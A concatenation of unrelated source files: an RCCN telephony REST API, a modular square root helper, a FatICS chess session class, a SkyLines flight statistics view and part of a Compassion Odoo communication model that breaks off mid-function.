            reseller.edit_messages(mess1, mess2, mess3, mess4, mess5, mess6)
            data = {'status': 'success', 'error': ''}
        except ResellerException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    # delete reseller
    @route('/<msisdn>', Http.DELETE)
    def delete(self, request, msisdn):
        api_log.info('%s - [DELETE] %s/%s' % (request.getHost().host, self.path, msisdn))
        try:
            reseller = Reseller()
            reseller.delete(msisdn)
            data = {'status': 'success', 'error': ''}
        except ResellerException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data
class CreditRESTService:
    """REST endpoints for adding airtime credit (mounted at /credit)."""
    path = '/credit'

    @route('/', Http.POST)
    def post(self, request, msisdn, amount):
        # Credit a subscriber account.
        api_log.info('%s - [POST] %s/add Data: msisdn:"%s" amount:"%s"' % (request.getHost().host, self.path, msisdn, amount))
        try:
            Credit().add(msisdn, amount)
            outcome = {'status': 'success', 'error': ''}
        except CreditException as err:
            outcome = {'status': 'failed', 'error': str(err)}
        api_log.info(outcome)
        return outcome

    @route('/reseller', Http.POST)
    def reseller(self, request, msisdn, amount):
        # Credit a reseller account.
        api_log.info('%s - [POST] %s/reseller Data: msisdn:"%s" amount:"%s"' % (request.getHost().host, self.path, msisdn, amount))
        try:
            Credit().add_to_reseller(msisdn, amount)
            outcome = {'status': 'success', 'error': ''}
        except CreditException as err:
            outcome = {'status': 'failed', 'error': str(err)}
        api_log.info(outcome)
        return outcome
class SMSRESTService:
    """REST endpoints for receiving and sending SMS (mounted at /sms)."""
    path = '/sms'

    @route('/', Http.POST)
    def receive(self, request, source, destination, charset, coding, text):
        # Inbound SMS handed over by the SMS gateway.
        api_log.info('%s - [POST] %s Data: source:"%s" destination:"%s" charset:"%s" coding: "%s" text:"%s"' % (request.getHost().host, self.path, source,
            destination, charset, coding, text))
        try:
            SMS().receive(source, destination, text, charset, coding)
            outcome = {'status': 'success', 'error': ''}
        except SMSException as err:
            outcome = {'status': 'failed', 'error': str(err)}
        api_log.info(outcome)
        return outcome

    @route('/send', Http.POST)
    def send(self, request, source, destination, text):
        # Outbound single SMS.
        api_log.info('%s - [POST] %s/send Data: source:"%s" destination:"%s" text:"%s"' % (request.getHost().host, self.path, source, destination, text))
        try:
            SMS().send(source, destination, text)
            outcome = {'status': 'success', 'error': ''}
        except SMSException as err:
            outcome = {'status': 'failed', 'error': str(err)}
        api_log.info(outcome)
        return outcome

    @route('/send_broadcast', Http.POST)
    def send_broadcast(self, request, text, btype):
        # Broadcast SMS to the group selected by btype.
        api_log.info('%s - [POST] %s/send_broadcast Data: text:"%s" btype:"%s"' % (request.getHost().host, self.path, text, btype))
        try:
            SMS().send_broadcast(text, btype)
            outcome = {'status': 'success', 'error': ''}
        except SMSException as err:
            outcome = {'status': 'failed', 'error': str(err)}
        api_log.info(outcome)
        return outcome
class StatisticsRESTService:
    """Read-only statistics endpoints (mounted at /statistics).

    Every handler follows the same pattern: log the request, query the
    matching statistics collector, and return either a bare value or a
    PGEncoder-serialized JSON string; failures are reported as a
    {'status': 'failed', 'error': ...} dict.
    """
    path = '/statistics'

    # Calls statistics
    @route('/calls/total_calls')
    def total_calls(self, request):
        # Total number of calls ever made.
        api_log.info('%s - [GET] %s/calls/total_calls' % (request.getHost().host, self.path))
        try:
            stats = CallsStatistics()
            data = stats.get_total_calls()
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/calls/total_minutes')
    def total_minutes(self, request):
        # Total minutes of all calls.
        api_log.info('%s - [GET] %s/calls/total_minutes' % (request.getHost().host, self.path))
        try:
            stats = CallsStatistics()
            data = stats.get_total_minutes()
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/calls/average_call_duration')
    def average_call_duration(self, request):
        api_log.info('%s - [GET] %s/calls/average_call_duration' % (request.getHost().host, self.path))
        try:
            stats = CallsStatistics()
            data = json.dumps(stats.get_average_call_duration(), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/calls/total_calls_by_context',Http.POST)
    def total_calls_by_context(self, request, context):
        # Call count restricted to one dialplan context.
        api_log.info('%s - [POST] %s/calls/total_calls_by_context Data: context:"%s"' % (request.getHost().host, self.path, context))
        try:
            stats = CallsStatistics()
            data = stats.get_total_calls_by_context(context)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/calls/calls',Http.POST)
    def calls(self, request, period):
        # Per-period call-count series.
        api_log.info('%s - [POST] %s/calls/calls Data: period:"%s"' % (request.getHost().host, self.path, period))
        try:
            stats = CallsStatistics()
            data = json.dumps(stats.get_calls_stats(period), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/calls/calls_minutes',Http.POST)
    def calls_minutes(self, request, period):
        # Per-period call-minutes series.
        api_log.info('%s - [POST] %s/calls/calls_minutes Data: period:"%s"' % (request.getHost().host, self.path, period))
        try:
            stats = CallsStatistics()
            data = json.dumps(stats.get_calls_minutes_stats(period), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/calls/calls_context',Http.POST)
    def calls_context(self, request, period):
        # Per-period call series split by dialplan context.
        api_log.info('%s - [POST] %s/calls/calls_context Data: period:"%s"' % (request.getHost().host, self.path, period))
        try:
            stats = CallsStatistics()
            data = json.dumps(stats.get_calls_context_stats(period), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    # Costs/Credits statistics
    @route('/costs/total_spent')
    def total_spent(self, request):
        api_log.info('%s - [GET] %s/costs/total_spent' % (request.getHost().host, self.path))
        try:
            stats = CostsStatistics()
            data = json.dumps(stats.get_total_spent(), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/costs/average_call_cost')
    def average_call_cost(self, request):
        api_log.info('%s - [GET] %s/costs/average_call_cost' % (request.getHost().host, self.path))
        try:
            stats = CostsStatistics()
            data = json.dumps(stats.get_average_call_cost(), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/costs/total_spent_credits')
    def total_spent_credits(self, request):
        api_log.info('%s - [GET] %s/costs/total_spent_credits' % (request.getHost().host, self.path))
        try:
            stats = CostsStatistics()
            data = json.dumps(stats.get_total_spent_credits(), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/costs/top_destinations')
    def top_destinations(self, request):
        # Most expensive call destinations.
        api_log.info('%s - [GET] %s/top_destinations' % (request.getHost().host, self.path))
        try:
            stats = CostsStatistics()
            data = json.dumps(stats.get_top_destinations(), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/costs/costs_stats', Http.POST)
    def costs_stats(self, request, period):
        # Per-period cost series.
        api_log.info('%s - [POST] %s/costs/costs_stats Data: period:"%s"' % (request.getHost().host, self.path, period))
        try:
            stats = CostsStatistics()
            data = json.dumps(stats.get_costs_stats(period), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data

    @route('/costs/credits_stats',Http.POST)
    def credits_stats(self, request, period):
        # Per-period credit series.
        api_log.info('%s - [POST] %s/costs/credits_stats Data: period:"%s"' % (request.getHost().host, self.path, period))
        try:
            stats = CostsStatistics()
            data = json.dumps(stats.get_credits_stats(period), cls=PGEncoder)
        except StatisticException as e:
            data = {'status': 'failed', 'error': str(e)}
        api_log.info(data)
        return data
class ConfigurationRESTService:
    """Read-only endpoints exposing site configuration."""
    path = '/configuration'

    @route('/site', Http.GET)
    def site(self, request):
        # Basic site record.
        api_log.info('%s - [GET] %s/site' % (request.getHost().host, self.path))
        try:
            payload = json.dumps(Configuration().get_site(), cls=PGEncoder)
        except ConfigurationException as err:
            payload = {'status': 'failed', 'error': str(err)}
        api_log.info(payload)
        return payload

    @route('/locations', Http.GET)
    def locations(self, request):
        # Known site locations.
        api_log.info('%s - [GET] %s/locations' % (request.getHost().host, self.path))
        try:
            payload = json.dumps(Configuration().get_locations(), cls=PGEncoder)
        except ConfigurationException as err:
            payload = {'status': 'failed', 'error': str(err)}
        api_log.info(payload)
        return payload

    @route('/config', Http.GET)
    def config(self, request):
        # Full site configuration blob.
        api_log.info('%s - [GET] %s/config' % (request.getHost().host, self.path))
        try:
            payload = json.dumps(Configuration().get_site_config(), cls=PGEncoder)
        except ConfigurationException as err:
            payload = {'status': 'failed', 'error': str(err)}
        api_log.info(payload)
        return payload
def run_rapi():
    """Wire up all REST services and serve the RCCN API on port 8085."""
    api_log.info('Starting up RCCN API manager')
    services = (
        SubscriberRESTService(),
        ResellerRESTService(),
        CreditRESTService(),
        StatisticsRESTService(),
        SMSRESTService(),
        ConfigurationRESTService(),
    )
    app = RESTResource(services)
    app.run(8085)


if __name__ == "__main__":
    run_rapi()
|
aweinstock314/aweinstock-ctf-writeups
|
cccamp_2019/prejudiced/bendersky_modsqrt.py
|
# https://eli.thegreenplace.net/2009/03/07/computing-modular-square-roots-in-python
def modular_sqrt(a, p):
    """ Find a quadratic residue (mod p) of 'a'. p
    must be an odd prime.

    Solve the congruence of the form:
    x^2 = a (mod p)
    And returns x. Note that p - x is also a root.

    0 is returned is no square root exists for
    these a and p.

    The Tonelli-Shanks algorithm is used (except
    for some simple cases in which the solution
    is known from an identity). This algorithm
    runs in polynomial time (unless the
    generalized Riemann hypothesis is false).
    """
    # Simple cases
    #
    if legendre_symbol(a, p) != 1:
        return 0
    elif a == 0:
        return 0
    elif p == 2:
        return 0
    elif p % 4 == 3:
        # Direct identity for primes p = 3 (mod 4).  Floor division
        # keeps the exponent an int on both Python 2 and 3 (plain '/'
        # would yield a float on Python 3 and break pow()).
        return pow(a, (p + 1) // 4, p)

    # Partition p-1 to s * 2^e for an odd s (i.e.
    # reduce all the powers of 2 from p-1)
    #
    s = p - 1
    e = 0
    while s % 2 == 0:
        s //= 2
        e += 1

    # Find some 'n' with a legendre symbol n|p = -1.
    # Shouldn't take long.
    #
    n = 2
    while legendre_symbol(n, p) != -1:
        n += 1

    # Here be dragons!
    # Read the paper "Square roots from 1; 24, 51,
    # 10 to Dan Shanks" by Ezra Brown for more
    # information
    #
    # x is a guess of the square root that gets better
    # with each iteration.
    # b is the "fudge factor" - by how much we're off
    # with the guess. The invariant x^2 = ab (mod p)
    # is maintained throughout the loop.
    # g is used for successive powers of n to update
    # both a and b
    # r is the exponent - decreases with each update
    #
    x = pow(a, (s + 1) // 2, p)
    b = pow(a, s, p)
    g = pow(n, s, p)
    r = e

    while True:
        t = b
        m = 0
        # 'range' instead of Python-2-only 'xrange': works on 2 and 3.
        for m in range(r):
            if t == 1:
                break
            t = pow(t, 2, p)

        if m == 0:
            return x

        gs = pow(g, 2 ** (r - m - 1), p)
        g = (gs * gs) % p
        x = (x * gs) % p
        b = (b * g) % p
        r = m
def legendre_symbol(a, p):
    """ Compute the Legendre symbol a|p using
    Euler's criterion. p is a prime, a is
    relatively prime to p (if p divides
    a, then a|p = 0)

    Returns 1 if a has a square root modulo
    p, -1 otherwise.
    """
    # Floor division: '(p - 1) / 2' would be a float exponent on
    # Python 3 and make pow() raise; '//' is correct on 2 and 3.
    ls = pow(a, (p - 1) // 2, p)
    return -1 if ls == p - 1 else ls
|
ecolitan/fatics
|
src/session.py
|
# Copyright (C) 2010 Wil Mahan <wmahan+fatics@gmail.com>
#
# This file is part of FatICS.
#
# FatICS is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# FatICS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with FatICS. If not, see <http://www.gnu.org/licenses/>.
#
import time
import copy
import var
import game
import timeseal
import partner
from game_list import GameList
# user state that is per-session and not saved to persistent storage
class Session(object):
    """Per-connection, in-memory user state; never saved to persistent
    storage."""
    def __init__(self, conn):
        self.conn = conn
        self.login_time = time.time()
        self.last_command_time = time.time()
        # Targets of the most recent tells, for quick-reply commands.
        self.last_tell_user = None
        self.last_tell_ch = None
        self.last_opp = None
        self.use_timeseal = False
        # Outstanding pings as (send timestamp, for_move flag) pairs, and
        # recent round-trip times used for lag estimation.
        self.ping_sent = []
        self.ping_time = []
        self.move_sent_timestamp = None
        self.use_zipseal = False
        self.check_for_timeseal = True
        # Pending offers sent by / addressed to this user.
        self.offers_sent = []
        self.offers_received = []
        self.game = None
        self.ivars = var.varlist.get_default_ivars()
        self.lag = 0
        self.observed = GameList()
        self.closed = False
        self.seeks = []
        self.partner = None
        # Follow / idlenotify bookkeeping, mirrored on the other users.
        self.following = None
        self.followed_by = set()
        self.idlenotifying = set()
        self.idlenotified_by = set()

    def set_user(self, user):
        # Bind the authenticated user to this session and greet them.
        self.user = user
        self.conn.write(_('**** Starting FICS session as %s ****\n\n') % user.get_display_name())

    def get_idle_time(self):
        """ returns seconds """
        assert(self.last_command_time is not None)
        return time.time() - self.last_command_time

    def get_online_time(self):
        """ returns seconds """
        assert(self.login_time is not None)
        return time.time() - self.login_time

    def close(self):
        """Tear down session state on logout: withdraw/decline pending
        offers, end the partnership, leave the game, notify followers and
        idlenotify watchers, unobserve games and remove seeks."""
        assert(not self.closed)
        self.closed = True
        # XXX this will not remove draw offers; game-related offers
        # should probably be saved when a game is adjourned
        for v in self.offers_sent[:]:
            assert(v.a == self.user)
            v.withdraw_logout()
        for v in self.offers_received[:]:
            assert(v.b == self.user)
            v.decline_logout()
        if self.partner:
            #self.conn.write(_('Removing partnership with %s.\n') %
            #    partner.name)
            self.partner.write_('\nYour partner, %s, has departed.\n',
                self.user.name)
            partner.end_partnership(self.partner, self.user)
        if self.game:
            # leave() is expected to clear self.game.
            self.game.leave(self.user)
            assert(self.game == None)
        del self.offers_received[:]
        del self.offers_sent[:]
        for u in self.idlenotified_by:
            u.write_("\nNotification: %s, whom you were idlenotifying, has departed.\n", (self.user.name,))
            u.session.idlenotifying.remove(self.user)
        self.idlenotified_by.clear()
        if self.followed_by:
            for p in self.followed_by.copy():
                p.write_('\n%s, whose games you were following, has logged out.\n', self.user.name)
            self.followed_by = set()
        # unobserve games
        assert(self.user.session == self)
        for g in self.observed.copy():
            g.unobserve(self.user)
        assert(not self.observed)
        # remove seeks
        if self.seeks:
            for s in self.seeks[:]:
                s.remove()
            self.conn.write(_('Your seeks have been removed.\n'))
        assert(not self.seeks)

    def set_ivars_from_str(self, s):
        """Parse a %b string sent by Jin to set ivars before logging in."""
        # Each character of s is the 0/1 value of the ivar at that index.
        for (i, val) in enumerate(s):
            self.ivars[var.ivar_number[i].name] = int(val)
        self.conn.write("#Ivars set.\n")

    def set_ivar(self, v, val):
        # A value of None clears the ivar back to its default.
        if val is not None:
            self.ivars[v.name] = val
        else:
            if v.name in self.ivars:
                del self.ivars[v.name]

    def ping(self, for_move=False):
        # don't send another ping if one is already pending
        assert(self.use_timeseal or self.use_zipseal)
        # Always send a ping with a move in a game being played.
        # Otherwise, send a ping if one is not already pending.
        if for_move or not self.ping_sent:
            if self.use_zipseal:
                self.conn.write(timeseal.ZIPSEAL_PING)
            else:
                self.conn.write(timeseal.TIMESEAL_1_PING)
            self.ping_sent.append((time.time(), for_move))

    def pong(self, t):
        """Handle a ping reply; t is the client timestamp from the reply."""
        assert(self.ping_sent)
        sent_time, for_move = self.ping_sent.pop(0)
        reply_time = time.time() - sent_time
        # Keep only the ten most recent round-trip samples.
        if len(self.ping_time) > 9:
            self.ping_time.pop(0)
        self.ping_time.append(reply_time)
        if for_move:
            self.move_sent_timestamp = t
# vim: expandtab tabstop=4 softtabstop=4 shiftwidth=4 smarttab autoindent
|
kerel-fs/skylines
|
skylines/frontend/views/statistics.py
|
from flask import Blueprint, render_template, abort, request, jsonify
from sqlalchemy import func, distinct
from skylines.database import db
from skylines.lib.dbutil import get_requested_record
from skylines.lib.vary import vary
from skylines.model import User, Club, Flight, Airport
statistics_blueprint = Blueprint('statistics', 'skylines')
@statistics_blueprint.route('/')
@statistics_blueprint.route('/<page>/<id>')
@vary('accept')
def index(page=None, id=None):
    """Yearly flight statistics, optionally filtered by pilot, club or
    airport; rendered as the Ember page or, for JSON requests, as a
    JSON document with per-year aggregates.

    Fixes: local variable 'list' shadowed the builtin (renamed to
    'years'); dead 'row.average_*' attribute assignments removed (the
    values were recomputed inline for the response anyway).
    """
    if 'application/json' not in request.headers.get('Accept', ''):
        return render_template('ember-page.jinja', active_page='statistics')

    name = None

    query = db.session.query(Flight.year.label('year'),
                             func.count('*').label('flights'),
                             func.count(distinct(Flight.pilot_id)).label('pilots'),
                             func.sum(Flight.olc_classic_distance).label('distance'),
                             func.sum(Flight.duration).label('duration'))

    pilots_query = db.session.query(func.count(distinct(Flight.pilot_id)))

    if page == 'pilot':
        pilot = get_requested_record(User, id)
        name = unicode(pilot)
        query = query.filter(Flight.pilot_id == pilot.id)

    elif page == 'club':
        club = get_requested_record(Club, id)
        name = unicode(club)
        query = query.filter(Flight.club_id == club.id)
        pilots_query = pilots_query.filter(Flight.club_id == club.id)

    elif page == 'airport':
        airport = get_requested_record(Airport, id)
        name = unicode(airport)
        query = query.filter(Flight.takeoff_airport_id == airport.id)
        pilots_query = pilots_query.filter(Flight.takeoff_airport_id == airport.id)

    elif page is not None:
        abort(404)

    query = query.filter(Flight.is_rankable())
    query = query.group_by(Flight.year).order_by(Flight.year.desc())

    # A total pilot count is meaningless on a single pilot's page.
    if page == 'pilot':
        sum_pilots = 0
    else:
        sum_pilots = pilots_query.scalar()

    years = []
    for row in query:
        years.append({
            'year': row.year,
            'flights': row.flights,
            'distance': row.distance,
            'duration': row.duration.total_seconds(),
            'pilots': row.pilots,
            'average_distance': row.distance / row.flights,
            'average_duration': row.duration.total_seconds() / row.flights,
        })

    return jsonify(name=name, years=years, sumPilots=sum_pilots)
|
ecino/compassion-switzerland
|
partner_communication_switzerland/models/partner_communication.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2016 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is in the file __manifest__.py
#
##############################################################################
import base64
import time
import logging
import re
from ..wizards.generate_communication_wizard import SMS_CHAR_LIMIT, SMS_COST
from math import ceil
from collections import OrderedDict
from datetime import date, datetime
from io import BytesIO
from dateutil.relativedelta import relativedelta
from odoo.addons.sponsorship_compassion.models.product import GIFT_REF
from odoo import api, models, _, fields
from odoo.exceptions import MissingError, UserError
_logger = logging.getLogger(__name__)
try:
from pyPdf import PdfFileWriter, PdfFileReader
from bs4 import BeautifulSoup
except ImportError:
_logger.warning("Please install pypdf and bs4 for using the module")
class PartnerCommunication(models.Model):
    """Swiss extensions of partner communication jobs (attachments,
    SMS sending, event links)."""
    _inherit = 'partner.communication.job'

    # Optional links to an event and its ambassador.
    event_id = fields.Many2one('crm.event.compassion', 'Event')
    ambassador_id = fields.Many2one('res.partner', 'Ambassador')
    # Always CHF; see _compute_currency.
    currency_id = fields.Many2one('res.currency', compute='_compute_currency')
    utm_campaign_id = fields.Many2one('utm.campaign')
    # Cost charged when this job is sent as SMS.
    sms_cost = fields.Float()
    sms_provider_id = fields.Many2one(
        'sms.provider', 'SMS Provider',
        default=lambda self: self.env.ref('sms_939.large_account_id', False),
        readonly=False)
@api.model
def send_mode_select(self):
    """Extend the available send modes with the SMS channel."""
    options = super(PartnerCommunication, self).send_mode_select()
    options.append(('sms', _('SMS')))
    return options
@api.multi
def _compute_currency(self):
    """All communications are valued in Swiss Francs."""
    chf_currency = self.env.ref('base.CHF')
    for record in self:
        record.currency_id = chf_currency.id
def get_correspondence_attachments(self):
    """
    Include PDF of letters if the send_mode is to print the letters.
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    attachments = dict()
    # Report is used for print configuration
    report = 'report_compassion.b2s_letter'
    letters = self.get_objects()
    if self.send_mode == 'physical':
        # NOTE(review): get_objects() is called again instead of reusing
        # 'letters' -- presumably equivalent; confirm before deduplicating.
        for letter in self.get_objects():
            try:
                attachments[letter.file_name] = [
                    report, self._convert_pdf(letter.letter_image)]
            except MissingError:
                # Letter scan is gone: cancel automatic sending, leave a
                # note on the job, and keep processing remaining letters.
                _logger.warn("Missing letter image", exc_info=True)
                self.send_mode = False
                self.auto_send = False
                self.message_post(
                    _('The letter image is missing!'), _("Missing letter"))
                continue
    else:
        # Attach directly a zip in the letters
        letters.attach_zip()
    return attachments
def get_birthday_bvr(self):
    """
    Attach birthday gift slip with background for sending by e-mail
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    attachments = dict()
    # The slip background is only wanted for electronic sending.
    needs_background = self.send_mode and 'physical' not in self.send_mode
    unpaid = self.get_objects().filtered(lambda s: not s.birthday_paid)
    # [:1] keeps this safe on an empty recordset.
    recipient = unpaid[:1].gift_partner_id
    if unpaid and recipient == self.partner_id:
        birthday_product = self.env['product.product'].search([
            ('default_code', '=', GIFT_REF[0])], limit=1)
        attachments = unpaid.get_bvr_gift_attachment(
            birthday_product, needs_background)
    return attachments
def get_graduation_bvr(self):
    """
    Attach graduation gift slip with background for sending by e-mail
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    attachments = dict()
    # The slip background is only wanted for electronic sending.
    background = self.send_mode and 'physical' not in self.send_mode
    sponsorships = self.get_objects()
    graduation = self.env['product.product'].search([
        ('default_code', '=', GIFT_REF[4])], limit=1)
    # [:1] instead of [0]: an empty recordset yields an empty
    # gift_partner_id rather than raising IndexError (same guard as
    # get_birthday_bvr).
    gifts_to = sponsorships[:1].gift_partner_id
    if sponsorships and gifts_to == self.partner_id:
        attachments = sponsorships.get_bvr_gift_attachment(
            graduation, background)
    return attachments
def get_family_slip_attachment(self):
    """
    Attach family gift slip with background for sending by e-mail
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    attachments = dict()
    # The slip background is only wanted for electronic sending.
    background = self.send_mode and 'physical' not in self.send_mode
    sponsorships = self.get_objects()
    family = self.env['product.product'].search([
        ('default_code', '=', GIFT_REF[2])], limit=1)
    # [:1] instead of [0]: an empty recordset cannot raise IndexError
    # (same guard as get_birthday_bvr).
    gifts_to = sponsorships[:1].gift_partner_id
    if sponsorships and gifts_to == self.partner_id:
        attachments = sponsorships.get_bvr_gift_attachment(
            family, background)
    return attachments
def get_reminder_bvr(self):
    """
    Attach sponsorship due payment slip with background for sending by
    e-mail.

    Side effects: may set need_call (large dues, or LSV/DD withdrawal
    problems) and may set product_id for physical sending.
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    sponsorships = self.get_objects()
    # Verify big due periods
    if len(sponsorships.mapped('months_due')) > 3:
        self.need_call = 'before_sending'
    payment_mode = sponsorships.with_context(lang='en_US').mapped(
        'payment_mode_id.name')[0]
    # LSV-DD Waiting reminders special case
    if 'Waiting Reminder' in self.config_id.name and (
            'LSV' in payment_mode or 'Postfinance' in payment_mode):
        if self.partner_id.bank_ids:
            # We received the bank info but withdrawal didn't work.
            # Mark to call in order to verify the situation.
            self.need_call = 'before_sending'
        else:
            # Don't put payment slip if we just wait the authorization form
            return dict()
    # Put product sponsorship to print the payment slip for physical print.
    if self.send_mode and 'physical' in self.send_mode:
        self.product_id = self.env['product.product'].search([
            ('default_code', '=', 'sponsorship')], limit=1)
        return dict()
    # In other cases, attach the payment slip.
    report_name = 'report_compassion.bvr_due'
    return {
        _('sponsorship due.pdf'): [
            report_name,
            base64.b64encode(self.env['report'].get_pdf(
                sponsorships.ids, report_name,
                data={'background': True, 'doc_ids': sponsorships.ids}
            ))
        ]
    }
def get_label_from_sponsorship(self):
    """
    Attach sponsorship labels. Used from communication linked to children.
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    return self.get_label_attachment(self.get_objects())
def get_label_attachment(self, sponsorships=False):
    """
    Attach sponsorship labels. Used from communication linked to children.
    :param sponsorships: optional recordset of sponsorships; when absent,
                         the first sponsorship of each child of the
                         communication is collected.
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    if not sponsorships:
        sponsorships = self.env['recurring.contract']
        children = self.get_objects()
        for child in children:
            # [:1] instead of [0]: a child without sponsorships adds an
            # empty recordset instead of raising IndexError.
            sponsorships += child.sponsorship_ids[:1]
    attachments = dict()
    label_print = self.env['label.print'].search([
        ('name', '=', 'Sponsorship Label')], limit=1)
    label_brand = self.env['label.brand'].search([
        ('brand_name', '=', 'Herma A4')], limit=1)
    label_format = self.env['label.config'].search([
        ('name', '=', '4455 SuperPrint WeiB')], limit=1)
    label_wizard = self.env['label.print.wizard'].with_context({
        'active_ids': sponsorships.ids,
        'active_model': 'recurring.contract',
        'label_print': label_print.id,
        'must_skip_send_to_printer': True
    }).create({
        'brand_id': label_brand.id,
        'config_id': label_format.id,
        'number_of_labels': 33
    })
    label_data = label_wizard.get_report_data()
    report_name = 'label.report_label'
    attachments[_('sponsorship labels.pdf')] = [
        report_name,
        base64.b64encode(
            label_wizard.env['report'].get_pdf(
                label_wizard.ids, report_name, data=label_data))
    ]
    return attachments
def get_child_picture_attachment(self):
    """
    Attach child pictures to communication. It directly attach them
    to the communication if sent by e-mail and therefore does
    return an empty dictionary.
    :return: dict {}
    """
    self.ensure_one()
    res = dict()
    if self.send_mode and 'physical' not in self.send_mode:
        # Prepare attachments in case the communication is sent by e-mail
        children = self.get_objects()
        attachments = self.env['ir.attachment']
        for child in children:
            name = child.local_id + ' ' + child.last_photo_date + '.jpg'
            # One ir.attachment per child, holding the fullshot photo.
            attachments += attachments.create({
                'name': name,
                'datas_fname': name,
                'res_model': self._name,
                'res_id': self.id,
                'datas': child.fullshot,
            })
        # NOTE(review): no_print presumably keeps these attachments out
        # of the physical printout -- confirm against the print logic.
        self.with_context(no_print=True).ir_attachment_ids = attachments
    else:
        self.ir_attachment_ids = False
    return res
def get_yearly_payment_slips_2bvr(self):
    # Convenience variant: two payment slips per page instead of three.
    return self.get_yearly_payment_slips(bv_number=2)
def get_yearly_payment_slips(self, bv_number=3):
    """
    Attach payment slips

    Two sets of slips can be produced:
    - sponsorship payment slips, when the partner pays by BVR and
      still has payments due next year;
    - gift payment slips, for the sponsorships whose gift payer is
      this partner.

    :param bv_number number of BV on a page (switch between 2BV/3BV page)
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    # Only 2-per-page and 3-per-page report layouts exist.
    assert bv_number in (2, 3)
    sponsorships = self.get_objects()
    payment_mode_bvr = self.env.ref(
        'sponsorship_switzerland.payment_mode_bvr')
    attachments = dict()
    # IF payment mode is BVR and partner is paying
    # attach sponsorship payment slips
    pay_bvr = sponsorships.filtered(
        lambda s: s.payment_mode_id == payment_mode_bvr and
        s.partner_id == self.partner_id)
    report_obj = self.env['report']
    if pay_bvr and pay_bvr.must_pay_next_year():
        # Slips cover the whole next civil year.
        today = date.today()
        date_start = today.replace(today.year + 1, 1, 1)
        date_stop = date_start.replace(month=12, day=31)
        report_name = 'report_compassion.{}bvr_sponsorship'.format(
            bv_number)
        attachments.update({
            _('sponsorship payment slips.pdf'): [
                report_name,
                base64.b64encode(report_obj.get_pdf(
                    pay_bvr.ids, report_name,
                    data={
                        'doc_ids': pay_bvr.ids,
                        'date_start': fields.Date.to_string(date_start),
                        'date_stop': fields.Date.to_string(date_stop),
                        # No background when printed on preprinted paper.
                        'background': self.send_mode != 'physical'
                    }
                ))
            ]
        })
    # Attach gifts for correspondents
    pays_gift = self.env['recurring.contract']
    for sponsorship in sponsorships:
        # send_gifts_to holds the name of the field pointing to the
        # partner who pays the gifts (mapped resolves it dynamically).
        if sponsorship.mapped(sponsorship.send_gifts_to) == \
                self.partner_id:
            pays_gift += sponsorship
    if pays_gift:
        report_name = 'report_compassion.{}bvr_gift_sponsorship'.format(
            bv_number)
        # Only the first three gift products are printed on the slips.
        product_ids = self.env['product.product'].search([
            ('default_code', 'in', GIFT_REF[:3])
        ]).ids
        attachments.update({
            _('sponsorship gifts.pdf'): [
                report_name,
                base64.b64encode(report_obj.get_pdf(
                    pays_gift.ids, report_name,
                    data={
                        'doc_ids': pays_gift.ids,
                        'product_ids': product_ids
                    }
                ))
            ]
        })
    return attachments
def get_childpack_attachment(self):
    """
    Attach the small child dossier ("childpack") of the sponsored
    children, rendered in the sponsor's language.

    For the planned-exit lifecycle communication, the dossier of the
    SUB child (sub_sponsorship_id) is attached instead of the departing
    child's one.
    :return: dict {attachment_name: [report_name, pdf_data]}
    """
    self.ensure_one()
    lang = self.partner_id.lang
    sponsorships = self.get_objects()
    exit_conf = self.env.ref(
        'partner_communication_switzerland.lifecycle_child_planned_exit')
    if self.config_id == exit_conf and sponsorships.mapped(
            'sub_sponsorship_id'):
        sponsorships = sponsorships.mapped('sub_sponsorship_id')
    children = sponsorships.mapped('child_id')
    # Always retrieve latest information before printing dossier
    children.get_infos()
    report_name = 'report_compassion.childpack_small'
    return {
        _('child dossier.pdf'): [
            report_name,
            base64.b64encode(self.env['report'].get_pdf(
                children.ids, report_name, data={
                    'lang': lang,
                    'is_pdf': self.send_mode != 'physical',
                    'type': report_name,
                }))
        ]
    }
def get_tax_receipt(self):
    """
